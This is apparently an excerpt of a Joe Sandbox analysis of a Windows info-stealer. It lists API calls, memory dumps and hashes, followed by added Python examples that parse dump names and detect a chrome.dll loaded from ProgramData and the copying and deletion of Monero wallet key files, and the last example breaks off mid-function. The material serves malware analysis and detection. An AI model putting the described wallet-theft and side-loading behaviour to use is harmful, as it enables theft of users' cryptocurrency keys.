                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 807b0c306cf5926370bd55f5917eb6418736a9a60142a9fb5981998b746e2508
                          • Instruction ID: f461ab2c4d2a2e733a1d95f10d05d2afe1cf23000f2b38f2140aa1ec1950d84e
                          • Opcode Fuzzy Hash: 807b0c306cf5926370bd55f5917eb6418736a9a60142a9fb5981998b746e2508
                          • Instruction Fuzzy Hash: 69118CB1A44306ABD714CB88ED49FBFBBBCEB04B60F104169F615A7280D7755804CBA1
                          APIs
                          • StrStrA.SHLWAPI(00FDE338,00000000,00000000,?,00029F71,00000000,00FDE338,00000000), ref: 000393FC
                          • lstrcpyn.KERNEL32(002F7580,00FDE338,00FDE338,?,00029F71,00000000,00FDE338), ref: 00039420
                          • lstrlen.KERNEL32(00000000,?,00029F71,00000000,00FDE338), ref: 00039437
                          • wsprintfA.USER32 ref: 00039457
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 93bbd68290d838e59f4b06b6415c3bb0b0041ff08610daae9370126a45a4c24d
                          • Instruction ID: 413e8c409a1e8d9793bec1449ff93d68648fce5e7d014f2b742c8423c3f32387
                          • Opcode Fuzzy Hash: 93bbd68290d838e59f4b06b6415c3bb0b0041ff08610daae9370126a45a4c24d
                          • Instruction Fuzzy Hash: F001DA7550410CFFCB04DFA8D948EBE7BB8EF48394F108268FA0D9B244DA31AA54DB90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000212B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000212BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000212D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000212F5
                          • RegCloseKey.ADVAPI32(?), ref: 000212FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 09ee08a7c91380370fb313c1d4b6bed86df41abfd8e7d10041d5ced9b16cc52e
                          • Instruction ID: d3cc0c8697601f994087a24ac513fc953668c91e5eb85b7b3c561c65126558a1
                          • Opcode Fuzzy Hash: 09ee08a7c91380370fb313c1d4b6bed86df41abfd8e7d10041d5ced9b16cc52e
                          • Instruction Fuzzy Hash: A801E179A44209BFDB14DFD4EC49FAE77B8EB48751F1041A5FA05D7280D7709A14CB90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: caefe4c9d25af456a9abc9f472bf557c576a8c0cfc345c7cc191cae0ede8ac8d
                          • Instruction ID: 0509aada91ad680a9d47da27ef0e430f536b2d62c5d75f936f786bac750f76d7
                          • Opcode Fuzzy Hash: caefe4c9d25af456a9abc9f472bf557c576a8c0cfc345c7cc191cae0ede8ac8d
                          • Instruction Fuzzy Hash: 5741E7B011079C5EEB328B248D85FFBBBED9B45704F1444E8E98AE6143D2719A449F60
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00036903
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • ShellExecuteEx.SHELL32(0000003C), ref: 000369C6
                          • ExitProcess.KERNEL32 ref: 000369F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 385ea6799c707ccbc9150807fcab9844ad10ac5f13e60842ae365724c13e2da3
                          • Instruction ID: 3169e1c833e9889ae948af3969ea2951b9117f3dc6c575be343b9a283e9bf0d1
                          • Opcode Fuzzy Hash: 385ea6799c707ccbc9150807fcab9844ad10ac5f13e60842ae365724c13e2da3
                          • Instruction Fuzzy Hash: 6E314FB1901218ABDB15EB90ED96FDEB77CAF08310F404199F20A67192DF706B48CF69
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00040E10,00000000,?), ref: 000389BF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000389C6
                          • wsprintfA.USER32 ref: 000389E0
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: c0ecd8204cdd1084fd428e98a660f58677aa2dca698623831d7ebec294168e09
                          • Instruction ID: 3900dedf365d0c7a5f2b827ca9bbe91fd6a58d63de89c4e193e5aa1d22f3bf96
                          • Opcode Fuzzy Hash: c0ecd8204cdd1084fd428e98a660f58677aa2dca698623831d7ebec294168e09
                          • Instruction Fuzzy Hash: 152142B1A44204AFDB00DF98ED49FBEBBB8FB49750F104169FA16A7280C7755900CBA5
                          APIs
                          • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0002A098
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                          • API String ID: 1029625771-1545816527
                          • Opcode ID: 2f0f5f21bec03af4f6b78d27a8d2d5455e0b473e9db1e283be716c1be42ec304
                          • Instruction ID: 90cc5d6f37421d19081b3a46b4a9a41f1a1a3a393fb957b007747a8c4e632927
                          • Opcode Fuzzy Hash: 2f0f5f21bec03af4f6b78d27a8d2d5455e0b473e9db1e283be716c1be42ec304
                          • Instruction Fuzzy Hash: C3F01DB065D210AFE7109B64FD4CF7632A4EB063A4F00153CE50597190DFB458E9CB56
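Each function record in this report points at the same set of memory dumps, named by a dotted identifier ending in .sdmp. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin. It assumes that the fourth field of the name is the region's virtual address and the fifth its Win32 page protection (PAGE_READWRITE is 0x04, PAGE_EXECUTE_READWRITE 0x40, PAGE_EXECUTE_WRITECOPY 0x80); that reading fits the values in the report but is not documented on this page. Under that assumption the report's own list shows that everything past the PE header at the 0x20000 image base was dumped from memory that is both writable and executable, which is what an unpacked, self-modifying image looks like.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Win32 page-protection constants from winnt.h. That the fifth field of a Joe Sandbox
# dump name carries this value is an assumption made for this example.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
_EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
_WRITABLE = {0x04, 0x08, 0x40, 0x80}

# Eight dot-separated fields followed by ".sdmp". Only the 64-bit address (field 4)
# and the protection value (field 5) are interpreted; the rest is kept verbatim.
_DUMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<round>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<address>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<rest>[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRef:
    name: str
    dump_id: str
    address: int
    protect: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protect, f"0x{self.protect:08X}")

    @property
    def writable_and_executable(self) -> bool:
        return self.protect in _EXECUTABLE and self.protect in _WRITABLE

    def rva(self, image_base: int) -> int:
        """Offset of this dump relative to the in-memory image base."""
        return self.address - image_base


def parse_dump_name(name: str) -> DumpRef:
    m = _DUMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump identifier: {name!r}")
    return DumpRef(name.strip(), m["dump_id"], int(m["address"], 16), int(m["protect"], 16))


def protection_summary(names) -> Counter:
    """Count dumps per protection name, e.g. to spot an image that is mostly RWX."""
    return Counter(parse_dump_name(n).protection_name for n in names)


def rwx_regions(names, image_base: int):
    """(RVA, protection) for every dump that is both writable and executable."""
    return [(d.rva(image_base), d.protection_name)
            for d in map(parse_dump_name, names) if d.writable_and_executable]


# The dump identifiers listed in this report; 0x20000 is the "Offset" the report
# gives for the dumped PE.
IMAGE_BASE = 0x20000
REPORT_DUMPS = [
    "00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for rva, prot in rwx_regions(REPORT_DUMPS, IMAGE_BASE):
        print(f"RVA 0x{rva:06X}: {prot}")
    print(protection_summary(REPORT_DUMPS))
```

Only the region at the image base itself (the PE header) is plain PAGE_READWRITE; the other fifteen dumps are RWX or execute-writecopy, so the RVAs printed are the places to look for unpacked code when triaging the dumps offline.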
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000396AE,00000000), ref: 00038EEB
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00038EF2
                          • wsprintfW.USER32 ref: 00038F08
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: cf5af3484b82b14067d64a013bb3599718ab20233c8b4162a9e8057b7fd06e89
                          • Instruction ID: 345aebf47e03c3438b3236a3bf1225b5b5007f243c6b69539a3ce9ca39ce48d5
                          • Opcode Fuzzy Hash: cf5af3484b82b14067d64a013bb3599718ab20233c8b4162a9e8057b7fd06e89
                          • Instruction Fuzzy Hash: 80E0ECB5A48309BBDB10DB94ED0EE6D77B8EB05751F0001A4FE0A97340DA71AE10DB95
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0002AA11
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0002AB2F
                          • lstrlen.KERNEL32(00000000), ref: 0002ADEC
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                          • DeleteFileA.KERNEL32(00000000), ref: 0002AE73
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: c4ac9bdc07d064981d0a03c3c6bf5193594880fc98d9666d3c23178f84b3ef5c
                          • Instruction ID: 963d079f91051c6aecdccf56cc54942b3ead27b79cfd7ce133ca35d5accf1b75
                          • Opcode Fuzzy Hash: c4ac9bdc07d064981d0a03c3c6bf5193594880fc98d9666d3c23178f84b3ef5c
                          • Instruction Fuzzy Hash: 07E1B372A101189BCB05FBA4DDA6EEEB33DAF15300F508569F15676093EF306A48CB76
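Two behaviours are directly readable from the API lists in this report: a LoadLibraryA of C:\ProgramData\chrome.dll (a DLL name borrowed from Chrome, loaded from a user-writable directory) and, in the function above, path building with lstrcpy/lstrcat around \Monero\wallet.keys followed by CopyFileA, lstrlen and DeleteFileA, i.e. the wallet key file is copied, consumed and the copy deleted. The detection below is an added example and not Joe Sandbox or Stealc code; it runs over a constructed list of Sysmon-style events (the field names ProcessId, Image, ImageLoaded and TargetFilename, and the event IDs 7, 11 and 23/26, are assumed) and flags both patterns.

```python
from collections import defaultdict
from fnmatch import fnmatch
from pathlib import PureWindowsPath

# Directories where a genuine chrome.dll lives; the same file name anywhere under
# C:\ProgramData is the indicator seen in the report.
CHROME_INSTALL_GLOBS = (
    r"c:\program files\google\chrome\application\*",
    r"c:\program files (x86)\google\chrome\application\*",
    r"c:\users\*\appdata\local\google\chrome\application\*",
)
# Processes that legitimately create a Monero wallet.keys file.
WALLET_OWNER_GLOBS = (
    r"*\monero-wallet-gui.exe",
    r"*\monero-wallet-cli.exe",
    r"*\monero-wallet-rpc.exe",
)
IMAGE_LOAD, FILE_CREATE, FILE_DELETE = 7, 11, {23, 26}   # Sysmon event IDs (assumed)


def _matches(path: str, globs) -> bool:
    p = path.lower()
    return any(fnmatch(p, g) for g in globs)


def detect(events):
    """Return (rule, image, path) findings for both patterns, in event order."""
    findings = []
    staged = defaultdict(set)   # ProcessId -> wallet.keys copies that process created
    for e in events:
        eid, image = e["EventID"], e["Image"]
        if eid == IMAGE_LOAD:
            loaded = e["ImageLoaded"]
            lp = PureWindowsPath(loaded)
            if (lp.name.lower() == "chrome.dll"
                    and str(lp).lower().startswith("c:\\programdata\\")
                    and not _matches(loaded, CHROME_INSTALL_GLOBS)):
                findings.append(("chrome_dll_from_programdata", image, loaded))
        elif eid == FILE_CREATE:
            target = e["TargetFilename"]
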